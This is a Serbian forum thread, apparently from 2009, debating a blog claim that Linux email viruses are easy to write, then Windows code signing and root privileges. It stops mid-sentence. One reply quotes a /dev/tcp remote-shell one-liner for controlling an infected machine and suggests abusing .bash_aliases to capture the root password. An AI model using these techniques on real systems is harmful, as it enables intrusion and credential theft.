• Naslovna
• FAQ
• Pravilnik
• O ES-u
• Tim
• Korisnici
• Statistike

 

• elitesecurity ::
• elitemadzone ::
• EMAIL ::
• RSS ::
• ES Mobile

  Niste ulogovani?  Username :   Password:   

• Registracija
• Zaboravili ste password?
• Flashback ▲▼
• Login problem?

 

Pretraga:

 

Srodne teme 14.04.2024. Re: Gde je Kejt? (samo pogrešni odgovori) 13.10.2002. Easy CD Creator i Audio CD 11.07.2003. Why we need JVM ? 27.08.2003. Sobig osvaja internet? 25.04.2004. Linux kao virus - deinstalacija Windowsa 10.05.2004. merge sort optimizacija 30.11.2004. Može li netko uredit ili rec kako?? 20.01.2005. ASP - RecordCount 30.06.2005. Virus free ili ne? 24.03.2006. dali je linux bezbedan za internet? Navigacija Brisanje liste Aktuelne teme u ovom forumu: Minhen & Linux, sprdnja ili šta j.. Linux prebacio 4% Gde vidite nVidia-u za par godina Počelo čipovanje :) Konfiguracija wifi landing stranice za.. Ne volim kad se dimenzije proizvoda pr.. Gde vidite Intel-a za nekih 2 do 5 god.. Cloud, buducnost, prevara ili zabluda? Drugi procesor unutar intel x86 BootHole - virtually every Linux distr.. Takmičenje u hakovanju PC as a poorly debugged set of device .. Razvoj po opensource modelu slobodnih .. Apple će skenirati fotografije na iPh.. John McAfee - RIP Izaberite forum: Linux Linux aplikacije Linux desktop okruženja Linux hardware Windows desktop Windows aplikacije Zaštita Office Windows drajveri Office :: Word Office :: Excel Macintosh Mac hardware Mac software Iphone Enterprise Networking SOHO Networking Wireless Windows mreže Linux mreže Wireless :: WiMax Wireless :: Mikrotik Wireless :: Wireless oprema Linux/UNIX serveri i servisi Unix BSD Skript jezici Security Virtualizacija Cloud Computing Services Security :: Kriptografija i enkripcija .NET 3D programiranje Art of Programming Asembler C/C++ programiranje Kernel i OS programiranje Pascal / Delphi / Kylix Java Embedded sistemi Perl PHP Python Visual Basic 6 Veštačka inteligencija Security Coding XML GameDev - Razvoj Igara Ostali programski jezici PHP :: PHP za početnike PHP :: Smarty template engine .NET :: .NET Desktop razvoj .NET :: ASP.NET .NET :: WPF Programiranje C/C++ programiranje :: C/C++ za početnike Baze podataka MySQL Oracle Access MS SQL Firebird/Interbase PostgreSQL Fiksna telefonija VoIP Udruženje korisnika teleko.. GSM - telefoni GSM - upotreba GSM - servisiranje Mreže i novosti Smartphone Mreže i novosti :: Mobilni internet Mreže i novosti :: Telenor - korisnički servis Mreže i novosti :: VIP - korisnički servis Mreže i novosti :: MTS - korisnički servis Smartphone :: Symbian OS Smartphone :: Windows Mobile Smartphone :: Android GSM - telefoni :: Nokia PDA Uređaji GPS Portable Players Anonimnost i privatnost ISP Browseri E-mail Instant Messaging FTP Google Hosting ISP :: Wireless mreže i ISP ISP :: ADSL E-mail :: Anti-spam Instant Messaging :: IRC Hosting :: Domeni Google :: Gmail E-Marketing Web aplikacije Web dizajn i CSS Web dizajn softver Web razvoj Pretraživači i SEO Flash Javascript i AJAX Web dizajn i CSS :: Kritike Grafički dizajn Izdavaštvo 3D modelovanje Rasterska grafika Vektorska grafika 3D modelovanje :: CAD/CAM Matične ploče, procesori .. Video karte i monitori Storage Ostali hardver Overclocking & Modding PC Konfiguracije Laptopovi Vodič za kupovinu - PC har.. Tablet PC Muzička produkcija Audio kompresija Audio softver Video produkcija Video kompresija Video softver Multimedijalni uređaji Digitalni fotoaparati Digitalne kamere Home Theater Digitalni fotoaparati :: Fotografija Digitalni fotoaparati :: Vodič za kupovinu - Digita.. Elektronika Elektrotehnika Elektronika :: TV uređaji Elektronika :: Radio elektronika i tehnika Elektronika :: Mikrokontroleri Elektronika :: Audio-elektronika Auto-elektronika :: Tuning Vodič za učenje Vodič za posao Vodič za emigraciju Fizika Matematika Nauka Sertifikati Informatika Vodič za učenje :: Seminarski radovi Vodič za učenje :: Obrazovne institucije Vodič za emigraciju :: Život u USA Vodič za emigraciju :: Život u Norveškoj Vodič za emigraciju :: Život u Nemačkoj E-Poslovanje E-Kupovina IT pravo i politika razvoja IT događaji IT berza poslova IS i ERP Ekonomija Berza Cryptocoins IT berza poslova :: Arhiva IT berze poslova IT pravo i politika razvoja :: Registar Nacionalnog ID E-Poslovanje :: E-Transakcije E-Poslovanje :: Forex E-Kupovina :: Platne kartice Digitalna Televizija Advocacy Ankete Predlozi i pitanja Vesti Čekaonica Vesti :: ES leto manifestacija MadZone TechZone Poljoprivreda AutoZone MotoZone Svakodnevnica Video igre MadZone :: Zanimljivi linkovi MadZone :: Kultura TechZone :: Ergonomija TechZone :: Grejanje TechZone :: Klimatizacija TechZone :: Bela tehnika AutoZone :: Fiat Panda club Lista poslednjih: 16, 32, 64, 128 poruka.

Catch 22 Član broj: 148083 Poruke: 6176 77.46.221.* +21 Profil How to write a Linux virus in 5 easy steps 18.02.2009. u 01:40 - pre 184 meseci Citat: The rumor of the bullet-proof Linux architecture There is this rumor going around that Linux is virus free. It is said that the old-fashioned multi-user heritage of Linux (and other *nix OSs) prevents malware, since users are not normally running their programs in admin mode (as root user). We are reminded that execute bits are needed to run anything – contrary to Windows – and that execute bits aren't set on any attachments or files saved from emails or from a web-browser. Therefore, we are told, the very architecture of Linux is so much more superior to Windows that it's just not possible to successfully spread malware. Of course – it is acknowledged – a low-level bug, a buffer overflow or other issue is exploitable. But nevertheless, users can't just catch a virus by email or downloading malware from the Internet, contrary to “those Windows users”. Linux will protect them from their own stupidity. At least so the story goes. But sadly, that's not true. I will show how it is possible in a few easy steps to write a perfectly valid email borne virus for modern desktop Linux. I will do so not because I want to put down Linux. Quite the opposite: I like and support Linux, which is all I'm running at home and at work. I'm a big supporter of free and open software as readers of this blog will know. But if there are any security risks, even in my favorite OS or distribution then they will need to be discussed. Even more important: A false sense of security is worse than a lack of security. And unsubstantiated claims of superiority don't help in a reasonable discussion either. Ceo članak i uputstvo: Full article is over on geekzone.co.nz PS Nisam bio siguran da li je ovo možda tema za Advocacy, ali moderatori će već odlučiti... :) The 11th Hour: The forces blocking change Odgovor na temu

Nedeljko Nedeljko Stefanović Član broj: 314 Poruke: 8632 *.dynamic.sbb.rs. +2790 Profil Re: How to write a Linux virus in 5 easy steps 19.02.2009. u 13:52 - pre 184 meseci Nije valjda? Nismo znali da je GNU/Linux toliko moćan da se za njega čak i virusi mogu napisati. Nije bitno koji su zaključci izvučeni, već kako se do njih došlo. Odgovor na temu

EArthquake Član broj: 20684 Poruke: 884 *.eunet.rs. +67 Profil Re: How to write a Linux virus in 5 easy steps 19.02.2009. u 20:46 - pre 184 meseci moram priznati da sam ocekivao nesto pametnije kad sam video ovaj naslov razocaran sam ovaj virus koji se pominje je na nivou .bat virusa za winsows-e , znaci iz 90ih sada je 21 vek ! druga stvar , lik koji je pisao to , ili nezna , ili namerno izostavlja vrlo naprednu kontrolu pristupa preko tokena i sl stvari koju windowsi imaju , prica o tome kao da na windowsima nema nikakvih kontrola pristupa , kao da je zadnje sto je video bio win98 opet devedesete... trece , ima par stvari koje su mogle mnogo pametnije da se urade recimo u teksu http://www.phearless.org/i7/exploitation_chitchat.txt sam dao primer koriscenja shella za dobijanje neke vrste reverse bind shell accessa primer : Code: sh < /dev/tcp/192.168.0.1/4321 > /dev/tcp/192.168.0.1/1234 (sta i kako radi , koga zanima , moze videti u tekstu) mislim da bi ovo mozda bio laksi/bolji nacin za kontrolisanje inficiranog racunara... cetvrto , laksi nacin za maliciozno pokretanje fajlova (i eventualno hvatanje sifre za root) bi moglo da se uradi preko aliasa bash komandi (.bash_aliases fajl) sto bi dalo malu nezavisnost od okruzenja (GNOME KDE ...) mislim stvarno , cemu ovoliki FUD po internetu oko ovoga , razlog zasto autor teksta nije mogao da nadje da je neko vec koristio slicne trikove je verovatno zato sto su isuvise ocigledni pa se niko nije trudio da ih dokumentuje , znam da je meni vec padalo takvo nesto na pamet ... naravno da linux nije imun na viruse , Silvio Cesare je pre vise od 10 (!!!) godina pisao o pravim virusima (dakle , stvarno inficiraju fajlove) za ELFove http://vx.netlux.org/lib/vsc01.html a ima i skorijih radova na slicnu temu ... o tako necemu bih voleo da citam , a ne ove gluposti ... Odgovor na temu

Nedeljko Nedeljko Stefanović Član broj: 314 Poruke: 8632 *.dynamic.sbb.rs. +2790 Profil Re: How to write a Linux virus in 5 easy steps 20.02.2009. u 10:50 - pre 184 meseci Šta ćeš, uvek će biti pronalazača tople vode, ali se broj oblasti u kojima se topla voda otkriva stalno povećava. Nije bitno koji su zaključci izvučeni, već kako se do njih došlo. Odgovor na temu

Ivan Dimkovic Administrator Član broj: 13 Poruke: 16687 *.dip.t-dialin.net. +7177 Profil Re: How to write a Linux virus in 5 easy steps 20.02.2009. u 11:25 - pre 184 meseci Citat: naravno da linux nije imun na viruse Napisati virus za Linux nije nista teze nego napisati virus za Windows posto oba sistema dopustaju ucitavanje izvrsnih fajlova bez digiatalnih potpisa + drajveri im trce u Intel-ovom Ringu 0 bez ikakvih sigurnosnih konteksta. Ali su Linux korisnici ipak u boljoj poziciji jer trziste Linux virusa ne postoji - pa je i broj pretnji daleko manji, tj. skoro nikakav u kontekstu tih malware-a pisanih za mase. Viruse danas ne pisu neki klinci radi zabave, vec ih pisu developeri za $$$ koje dobijaju od kriminalnih organizacija - to je postao fakin biznis... Samim tim, taj biznis se rukovodi trzisnim pravilima, a to je da ciljaju na najvecu grupu korisnika, a to su, u ovom momentu, Windows korisnici. Sa druge strane, postoji i te kako dosta specijalizovanih napada na Linux masine - ali oni su sasvim drugog tipa, obicno se to radi "po customeru" i, naravo, iza toga obicno stoji $$$. Obicno su tu ciljne masine serveri i nacin napada je daleko kompleksniji i tezi za otkrivanje nego glupavi Windows trojani & sl.. Tako da, prosecan Linux korisnik je izlozen daleko manjoj kolicini opasnosti nego prosecan Windows korisnik. Opet, uz malo zdravog razuma je moguce biti potpuno zasticen od virusa i na Windows masini bez ikakvog AV softvera - ali je taj cilj danas lakse postici na Linuxu iz prostog razloga sto je broj opasnosti manji. Inace, mislim da ce masovnim virusima koji se repliciraju po korisnickim kompjuterima odzvoniti onda kada OS vendori budu uveli obavezne digitalne potpise za bilo sta sto se izvrsava - molim lepo, ako ste developer na svojoj masini mozete sami sebi izdati sertifikat, ali ako to hocete da prodajete drugima u izvrsnom obiliku, na to cete morati zakaciti digitalni sertifikat izdat od strane autoriteta sa poverenjem. Time bi se onemogucilo menjanje koda. Microsoft je uveo mandatory signing za drajvere u x64 verziji svog OS-a ali misim da je to nedovoljan korak - to su trebali da urade sa svim izvrsnim fajlovima - mozda ne potpuno ukinuti mogucnost izvrsavanja istih, ali samo uz jako velika upozorenja i mere zastite - recimo, zabranjeno izvrsavanje takvih procesa sa admin privilegijama. To naravno nece spreciti internet prevare i identity theft... ali od kada je coveka bilo je i kriminala, to nije nista novo. DigiCortex (ex. SpikeFun) - Cortical Neural Network Simulator: http://www.digicortex.net/node/1 Videos: http://www.digicortex.net/node/17 Gallery: http://www.digicortex.net/node/25 PowerMonkey - Redyce CPU Power Waste and gain performance! - https://github.com/psyq321/PowerMonkey Odgovor na temu

mulaz Ljubljana Član broj: 47602 Poruke: 2239 *.dial-up.dsl.siol.net. Jabber: mulaz@elitesecurity.org Sajt: www.mulaz.org +184 Profil Re: How to write a Linux virus in 5 easy steps 20.02.2009. u 11:44 - pre 184 meseci Citat: Ivan Dimkovic:  Inace, mislim da ce masovnim virusima koji se repliciraju po korisnickim kompjuterima odzvoniti onda kada OS vendori budu uveli obavezne digitalne potpise za bilo sta sto se izvrsava - molim lepo, ako ste developer na svojoj masini mozete sami sebi izdati sertifikat, ali ako to hocete da prodajete drugima u izvrsnom obiliku, na to cete morati zakaciti digitalni sertifikat izdat od strane autoriteta sa poverenjem. Time bi se onemogucilo menjanje koda. I ko ce da izdaje te certifikate? Ako imamo nesto tipa "samo m$", onda imamo problem, jer M$ odluci da ne voli neki software, i ne da potpis. Onda imamo drugu alternativu, kao sto je danas sa digitalnim certifikatima, i malim milijonom CA-a, kod kojih moze bilo ko da uzme certifikat na bilo cije ime, i radi sa njim sta hoce. Ja sam samo preleteo onaj tekst, ali koliko sam video, user mora da prebaci 'virus' na desktop, pa onda (zavisi od konfiguracije) namesti 'chmod +x', pa tek onda moze da pokrene... Dok na windowsima otvoris dva tri porno sajta, i oni sve to urade umesto tebe. btw: Svaki dan dobijam nekoliko onih poruka "look, i found this image of you http://mulaz.nesto.blabla/bla", i kad kliknem na link (u ocekivanju reklama za viagru, cialis i sl. sranja) firefox ponudi da sacuva .com file. Sad ne znam... dali na windowsima internet explorer sam pokrene taj .com (samo .com, ne ono .jpg.com), ili je stvarno toliko usera glupih da otvaraju to, pored svih upozorenja sa strane OS-a? Bolje ispasti glup nego iz aviona http://www.mulaz.org/ Odgovor na temu

Ivan Dimkovic Administrator Član broj: 13 Poruke: 16687 *.dip.t-dialin.net. +7177 Profil Re: How to write a Linux virus in 5 easy steps 20.02.2009. u 11:56 - pre 184 meseci Citat: mulaz I ko ce da izdaje te certifikate? Ako imamo nesto tipa "samo m$", onda imamo problem, jer M$ odluci da ne voli neki software, i ne da potpis. Onda imamo drugu alternativu, kao sto je danas sa digitalnim certifikatima, i malim milijonom CA-a, kod kojih moze bilo ko da uzme certifikat na bilo cije ime, i radi sa njim sta hoce. Nope, mislim da nisi ukapirao proces - posto imam licna iskustva sa Vista Kernel Mode sertifikatima mogu da ti objasnim proces: * Microsoft ima svoj "cross-cert" kljuc koji omogucava "lanac poverenja" i koji su izdali CA-ima od poverenja, tj. onima koji se pridrzavaju stroge procedure izdavanja sertifikata. Ukoliko drajver nije potpisan sa kljucem koji sadrzi i MS-ov "Cross-Cert" drajver nece biti ucitan (na x64 sistemima) * CA-ovi od poverenja su VeriSign/Thawte, GlobalSign, CyberTrust, Equifax i GeoTrust (http://www.microsoft.com/whdc/winlogo/drvsign/crosscert.mspx) - dakle, svako bitan. Takav sertifikat je moguce dobiti za ~$200 godisnje, sto je sasvim OK cena za bilo koga ko iole ozbiljno zeli da izdaje sw.. * Svi ovi CA-ovi su vrlo ozbiljne firme koje se i ta kako pridrzavaju procedure, cisto sumnjam da ce, recimo, VeriSign da izda sertifikat na ime firme tek tako. * Kernel-mode cert-ovi se mogu izdati samo pravnim licima, a za verifikaciju pravnog lica se tipicno trazi: a) Dokaz o osnivanju firme sa podacima o vlasnicima b) Identifikacija stvarne adrese firme kroz telefonski racun, racun za struju itd.. c) Verifikacija samog podnosioca zahteva kroz javni telefonski imenik, javne podatke o vlasnistvu firme i dodatnim proverama tipa telefonski poziv na zvanicni telefon firme Dakle, u slucaju tih cert-ova mozes biti prilicno siguran da je provereno da je to sto pise na sertifikatu tacno, i da iza toga stoji pravno lice. Eto, to bi trebalo prosiriti i na user-mode aplikacije, i otezati izvrsavanje drugih aplikacija u smislu - oduzimanja admin privilegija. To vec zapravo postoji u Windowsu i moguce ga je namestiti uz par klikova misem, ali problem je sto nije po defaultu i sto ga je moguce iskljuciti. Cela stvar bi jednostavno ubila taj besmisleni malware koji se izvrsava po licnim kompovima i umnozava. Neko ce reci da bi to ubilo male developere ali: 1. Mali developeri bi i dalje mogli da izdaju aplikacije koje rade u least-privileged modu i uz upozorenje da nisu potpisane. Ako neko hoce da izdaje aplikaciju koja trci u kontekstu administratora na sistemu, ili ima drajvere... tough luck, mislim to je dovoljno senzitivna stvar da ipak mora postojati bar malo volje da se autor identifikuje i garantuje autenticnost takve aplikacije 2. Svako iole ozbiljan nema problem da priusti $200/godisnje i najmanji vid pravnog lica. Neki od ovih sertifikata se mogu dobiti i sa popustom preko nekih drugih provajdera. 3. Za rad "po kuci" je i ovako i onako moguce sebi izdati root sertifikat kome "verujes" na svom sistemu DigiCortex (ex. SpikeFun) - Cortical Neural Network Simulator: http://www.digicortex.net/node/1 Videos: http://www.digicortex.net/node/17 Gallery: http://www.digicortex.net/node/25 PowerMonkey - Redyce CPU Power Waste and gain performance! - https://github.com/psyq321/PowerMonkey Odgovor na temu

MladenIsakovic Mladen Isaković Šabac Član broj: 58620 Poruke: 333 212.200.178.* Jabber: mladjai@elitesecurity.org ICQ: 162720715 Sajt: www.slackware-srbija.org +1 Profil Re: How to write a Linux virus in 5 easy steps 20.02.2009. u 15:10 - pre 184 meseci Citat: Ivan Dimkovic: Opet, uz malo zdravog razuma je moguce biti potpuno zasticen od virusa i na Windows masini bez ikakvog AV softvera - ali je taj cilj danas lakse postici na Linuxu iz prostog razloga sto je broj opasnosti manji. Ja kod kuće nikada nisam imao niti antivirus, niti antyspyware, niti bilo koji drugi shitware, samo firewall, i to onaj od XPSP2 ili Vistin built-in, i nikada nisam imao problema. Znam pravila ponašanja na netu, i nemam problema. Ako se kojim slučajem čak i desi (ko zna na koji način, nebitno) da pokupim neki shit, uvek bi mi bilo lakše da reinstaliram ceo OS sa sve programima (a za to danas imamo specijalizovane programe), i za vrlo kratko vreme sve ok, bolje i to nego da mi ta sva antishit g**** trče u memoriji non-stop i opterećuju sistem. Odgovor na temu

mulaz Ljubljana Član broj: 47602 Poruke: 2239 *.dial-up.dsl.siol.net. Jabber: mulaz@elitesecurity.org Sajt: www.mulaz.org +184 Profil Re: How to write a Linux virus in 5 easy steps 22.02.2009. u 10:22 - pre 184 meseci @Ivan Dimkovic Znaci ako nekoliko studenta za projekat na faksu pise recimo driver za pristup ext3/reiserfs/* particijama (koji radi relativno dobro), i to izdaju kao alpha verziju uz sva upozorenja koja su potrebna pored alfa verzije (da ne garantiraju nista, i ne odgovaraju, pa bilosta da se desi sa kompjuterom), i onda ako ja to hocu da instaliram na x64 vistu.. sta moram da uradim? -Potpisem njihov software sa mojim root certifikatom koji vazi samo na mom sistemu? I kako da to virus ne moze sam da uradi? -Da trazim od njih, koji su vec polozili taj predmet na faksu, i dobili ocenu, da bace jos 200usd i da potpisuju taj software? -??? Znaci, da li postoji mogucnost da ja kazem "Ja sam root!" i radim sta hocu na svom sistemu, kao sto je to moguce recimo na linuxu, gde mozes, ako si root, bez pitanja da uradis sta hoces, i kako hoces, pa koliko god to bilo destruktivno? Bolje ispasti glup nego iz aviona http://www.mulaz.org/ Odgovor na temu

Take 5 Član broj: 200551 Poruke: 1423 93.86.193.* +12 Profil Re: How to write a Linux virus in 5 easy steps 22.02.2009. u 12:18 - pre 184 meseci Ako bi ustrojstvo sertifikata bilo uspostavljeno na slican nacin kao sto je to slucaj na novijim verzijama Symbian OS-a za smart telefone, onda bi tu bio i kraj price o opstoj prihvacenosti takvog operativnog sistema. Cela ideja je sve drugo samo ne "user friendly", a osnovna namena (ako ne i jedina) je sprecavanje neautorizovanog koriscenja softvera (piraterije). Nadam se da su idejni tvorci ovog epohalnog resenja svesni da bi time sekli granu na kojoj sede. "Take Five" is the famous jazz piece written by Paul Desmond and performed by The Dave Brubeck Quartet. It is famous for its distinctive saxophone line and use of the unusual quintuple (5/4) time, from which its name is derived. Take Five (1966) Take Five by Al Jarreau 1976 Odgovor na temu

Ivan Dimkovic Administrator Član broj: 13 Poruke: 16687 *.dip.t-dialin.net. +7177 Profil Re: How to write a Linux virus in 5 easy steps 22.02.2009. u 12:55 - pre 184 meseci Citat: mulaz Znaci ako nekoliko studenta za projekat na faksu pise recimo driver za pristup ext3/reiserfs/* particijama (koji radi relativno dobro), i to izdaju kao alpha verziju uz sva upozorenja koja su potrebna pored alfa verzije (da ne garantiraju nista, i ne odgovaraju, pa bilosta da se desi sa kompjuterom), i onda ako ja to hocu da instaliram na x64 vistu.. sta moram da uradim? -Potpisem njihov software sa mojim root certifikatom koji vazi samo na mom sistemu? I kako da to virus ne moze sam da uradi? -Da trazim od njih, koji su vec polozili taj predmet na faksu, i dobili ocenu, da bace jos 200usd i da potpisuju taj software? -??? Ne, moras rucno ubaciti OS u "non trusted" mod sto dozvoljava izvrsavanje drajvera bez MS-CrossCert kljuca, sto je moguce iskljucivo preko boot-time opcije. Tu treba dodati ogromno upozorenje i to je to. I to je sasvim dovoljno - 99.9999% obicnih korisnika i ovako i onako to nikad ne bi uradilo, a oni i jesu glavni problem. Developerima i testerima nije problem da teraju sistem u tom modu, na kraju krajeva - developeri i sistem testeri nisu ljudi koji obicno fasuju viruse. Citat: Znaci, da li postoji mogucnost da ja kazem "Ja sam root!" i radim sta hocu na svom sistemu, kao sto je to moguce recimo na linuxu, gde mozes, ako si root, bez pitanja da uradis sta hoces, i kako hoces, pa koliko god to bilo destruktivno? Ne, to nikad nije bilo ni moguce na VMS-like operativnim sistemima kakav je i Windows NT/XP/Vista. Takodje mislim da su takvi sistemi daleko bolji za siru populaciju od sistema gde "root" ima pristup apsolutno svemu. Na Linuxu, koji je opet - UNIX-like cela ta prica sa potpisima i nema smisla, jer - kao sto sam znas, root uvek ima prava da override-uje bilo sta, sto je OK za neke stvari - ali onda uvek imas opasnost da prosecan korisnik bude prevaren i izmanipulisan da kao root dopusti nesto sto nije OK. DigiCortex (ex. SpikeFun) - Cortical Neural Network Simulator: http://www.digicortex.net/node/1 Videos: http://www.digicortex.net/node/17 Gallery: http://www.digicortex.net/node/25 PowerMonkey - Redyce CPU Power Waste and gain performance! - https://github.com/psyq321/PowerMonkey Odgovor na temu

nkrgovic Nikola Krgović Beograd Član broj: 3534 Poruke: 2807 ICQ: 49345867 Sajt: https://www.twinstarsyste.. +655 Profil Re: How to write a Linux virus in 5 easy steps 22.02.2009. u 13:31 - pre 184 meseci Citat: Ivan Dimkovic:Na Linuxu, koji je opet - UNIX-like cela ta prica sa potpisima i nema smisla, jer - kao sto sam znas, root uvek ima prava da override-uje bilo sta, sto je OK za neke stvari - ali onda uvek imas opasnost da prosecan korisnik bude prevaren i izmanipulisan da kao root dopusti nesto sto nije OK. Delimicno offtopic, ali na ozbiljim Unix-ima mozes uvesti ono sto zovu "two man rule", tj. da jedan administrator ne moze da uradi neke stvari, bez obzira na privilegije, vec da se moraju dogovoriti dvojica. Sustina je da imas dva odgovorna lica, pa da kriticne stvari moraju da urade zajedno. Naravno, imas dovoljno finu kontrolu sta ces staviti pod ovo pravilo, tj. da to koristis samo za najkriticnije stvari. Evo i linka: http://blogs.sun.com/gbrunett/entry/enforcing_a_two_man_rule Nisam siguran da li je ovo moguce uraditi sa SE Linux extenzijama. Kome se igra, moze da proba. Ali, poenta je, Unix sisteme je vrlo moguce obezbediti od svega, pa i od greske administratora. Naravno, ovo sve nema smisla za sistem krajnjeg korisnika kod kuce. Please do not feed the Trolls! Blasphemy? How can I blaspheme? I'm a god!' Odgovor na temu

calimero calimero Član broj: 14608 Poruke: 415 +34 Profil Re: How to write a Linux virus in 5 easy steps 23.02.2009. u 14:19 - pre 184 meseci Citat: mulaz: @Ivan Dimkovic Znaci ako nekoliko studenta za projekat na faksu pise recimo driver za pristup ext3/reiserfs/* particijama (koji radi relativno dobro), i to izdaju kao alpha verziju uz sva upozorenja koja su potrebna pored alfa verzije (da ne garantiraju nista, i ne odgovaraju, pa bilosta da se desi sa kompjuterom), i onda ako ja to hocu da instaliram na x64 vistu.. sta moram da uradim? -Potpisem njihov software sa mojim root certifikatom koji vazi samo na mom sistemu? I kako da to virus ne moze sam da uradi? -Da trazim od njih, koji su vec polozili taj predmet na faksu, i dobili ocenu, da bace jos 200usd i da potpisuju taj software? -??? Znaci, da li postoji mogucnost da ja kazem "Ja sam root!" i radim sta hocu na svom sistemu, kao sto je to moguce recimo na linuxu, gde mozes, ako si root, bez pitanja da uradis sta hoces, i kako hoces, pa koliko god to bilo destruktivno? kao sto je rekao "Take 5" - kupi neku Nokiju i probaj da instaliras nesto na Symbian - show program! pre bih da Apple sve sam testira i odobrava ako vec mora (kao sto radi sa AppStore) nego da se zajebavam sa Symbianom i njihovim sistemom za sertifikate! Citat: Ivan Dimkovic: Takodje mislim da su takvi sistemi daleko bolji za siru populaciju od sistema gde "root" ima pristup apsolutno svemu. a na "VMS" Windowsu 2000/XP korisnik inace nije "root" i nema pristup svemu po defaultu ? sta to ne mozes da uradis kao Root aka Administrator na Win2K/XP ? mislis na to sto moras eventulano da potvrdis nesto da je to osiguranje na Windowsu ? Odgovor na temu

mulaz Ljubljana Član broj: 47602 Poruke: 2239 *.dial-up.dsl.siol.net. Jabber: mulaz@elitesecurity.org Sajt: www.mulaz.org +184 Profil Re: How to write a Linux virus in 5 easy steps 23.02.2009. u 19:02 - pre 184 meseci Imam SonyEricsson P1i, sa symbianom, i otkljucavanje traje ~2 minuta (sa downloadom, instalacijom, i samim otkljucavanjem), i posle toga moze bilo sta da se instalira... Mislim da ni jailbreak iphone-a nije dosta tezi :) @calimero Je si ikad probao ono vecito "format c:"? (naravno ako su windowsi instalirani na c:\ particiji) :)) Bolje ispasti glup nego iz aviona http://www.mulaz.org/ Odgovor na temu

Catch 22 Član broj: 148083 Poruke: 6176 79.101.155.* +21 Profil Re: How to write a Linux virus in 5 easy steps 23.02.2009. u 22:34 - pre 184 meseci ^ SE P1 je vec "oldtimer" iz sredine 2007. Ovde se vise mislilo na novije (2008/2009) Nokije koje imaju Symbian OS 9.2-9.3, Series 60 v3.0-v3.2 UI The 11th Hour: The forces blocking change Odgovor na temu

z@re Zarko Bulatovic Split Član broj: 29849 Poruke: 443 *.xnet.hr. +25 Profil Re: How to write a Linux virus in 5 easy steps 06.04.2009. u 17:17 - pre 183 meseci Trusted-only mod u OSu je kretenarija i posluzila bi svrsi da nestane i ovo malo besplatnog softvera koji postoji za windowse. Sta je sa programerima besplatnih, malih utilitya, kojima se ne da dat 200 dolara godisnje da bi se cross-certali sa Microsoftom? Zelim instalirat neki besplatni MP3 ID3 tag editor koji sam dobio na DVDu uz kompjuterski casopis. Ja sam prosjecni end-user, i u maniri takvog ubacujem DVD, pali se autoplay, klik vamo klik tamo i dolazim do botuna za instalaciju programa. Kad li ono, Windowsi nesto seruckaju oko nekakvih certifikata, potpisa, digitalnih kljuceva, bakraci, samanluk, sedam krugova carobnjaka. Od svih tih informacija koje prvi put cujem jedva konstruiram kakav-takav query za googlanje, kad ono odgovor lezi u modificiranju stringa u boot descriptor fajlu. Ja i boot.ini ko bog i sesirdjije, odustajem. To ce napravit 70% end-usera i time propada besplatni segment trzista windows softvera. Jedino da neki CA dijeli besplatno trusted certifikate uz obaveznu valjanu identifikaciju (osobna karta, pasos, bilo sta). Q: HSP56 Micromodem nece da radi kompjuter ga prepozna a kad treba da se konektujem nece ne daje ni znaka zivota. u cemu je problem. A: Crko mozda od grmljavine mozda od spanaca. Uglavnom baci ga u WC solju jako povuci vodu. Skupi 5e i uzmi drugi i ne postuj temu na pogresno mesto. Odgovor na temu

Ivan Dimkovic Administrator Član broj: 13 Poruke: 16687 *.dip.t-dialin.net. +7177 Profil Re: How to write a Linux virus in 5 easy steps 06.04.2009. u 19:22 - pre 183 meseci Citat: calimero a na "VMS" Windowsu 2000/XP korisnik inace nije "root" i nema pristup svemu po defaultu ? sta to ne mozes da uradis kao Root aka Administrator na Win2K/XP ? mislis na to sto moras eventulano da potvrdis nesto da je to osiguranje na Windowsu ? Ne, root nema pristup svemu - ne mozes da pristupis kljucevima sistema, ne mozes da pristupis fizickoj memoriji iz user mode-a niti mozes da pristupis gomili drugih stvari koje su rezervisane za sistem. Nema sta da potvrdjujes ili ne, jednostavno user administrator nema security tokene koji mu to dozvoljavaju. Citat: z@re Trusted-only mod u OSu je kretenarija i posluzila bi svrsi da nestane i ovo malo besplatnog softvera koji postoji za windowse. Sta je sa programerima besplatnih, malih utilitya, kojima se ne da dat 200 dolara godisnje da bi se cross-certali sa Microsoftom? Netacno. Kao sto rekoh, ideja je da jedino softver koji trazi administratorske privilegije na sistemu bude potpisan, ili nece moci da trci. Sav softver koji se izvrsava u kontekstu korisnika moze ali i ne mora imati potpis. Uzgred, vecini softvera NE TREBAJU administratorske privilegije. DigiCortex (ex. SpikeFun) - Cortical Neural Network Simulator: http://www.digicortex.net/node/1 Videos: http://www.digicortex.net/node/17 Gallery: http://www.digicortex.net/node/25 PowerMonkey - Redyce CPU Power Waste and gain performance! - https://github.com/psyq321/PowerMonkey Odgovor na temu

bojan_bozovic Član broj: 29028 Poruke: 3292 *.dynamic.sbb.rs. Sajt: angelstudio.org +392 Profil Re: How to write a Linux virus in 5 easy steps 06.04.2009. u 19:45 - pre 183 meseci Dobro Ivane, je si li siguran da je to bolje od edukacije korisnika? Mislim, postoji jos bolja zastita od virusa, ali to je ne paliti racunar uopste. Stvarno se valja zapitati koliko jos ogranicenja svi mi moramo trpeti zato sto neko ne zna kako se koristi racunar. Odgovor na temu

z@re Zarko Bulatovic Split Član broj: 29849 Poruke: 443 *.xnet.hr. +25 Profil Re: How to write a Linux virus in 5 easy steps 06.04.2009. u 22:38 - pre 183 meseci Citat: Netacno. Kao sto rekoh, ideja je da jedino softver koji trazi administratorske privilegije na sistemu bude potpisan, ili nece moci da trci. Sav softver koji se izvrsava u kontekstu korisnika moze ali i ne mora imati potpis. Uzgred, vecini softvera NE TREBAJU administratorske privilegije. Vjerovat cu ti da se radi o vecini, ali ipak mislim da je to vecina u klasi 60-70 posto, cime ostaje 100.000 softverskih paketa koji zahtevaju administrativne privilegije. Windowsi imaju gadan arhitekturalni problem lose granulacije privilegija, ja recimo na UNIXu mogu dat jednom korisniku limited korisniku write privilegiju prema trecem USB portu, a ostalima zabranit. Ne znam sta se moze bez registry hackova, ali security policy editor je dosta siromasan. Jedan problem koji me zahvatio nedavno je sta ne mogu da zabranim ctrl-alt-del, desni klik, i neke druge stvari per user. Naravno, pricamo o standalone setupu bez domenskog kontrolera koji ce pushat security policy ovisno o accountu. Slazem se da su lijeni i intertni programeri dosta krivi (samo jedan postotak softvera pita korisnika da li ce se instalirat globalno ili lokalno, programi koji cak ne zahtjevaju po svojoj izradi administrativne privilegije nece da rade limited, zato sta papcinarski installeri zele da se guraju u HKLM a ne HKCU), ali imaju i Windowsi po defaultu masu krivnje. Jedan najnormalniji 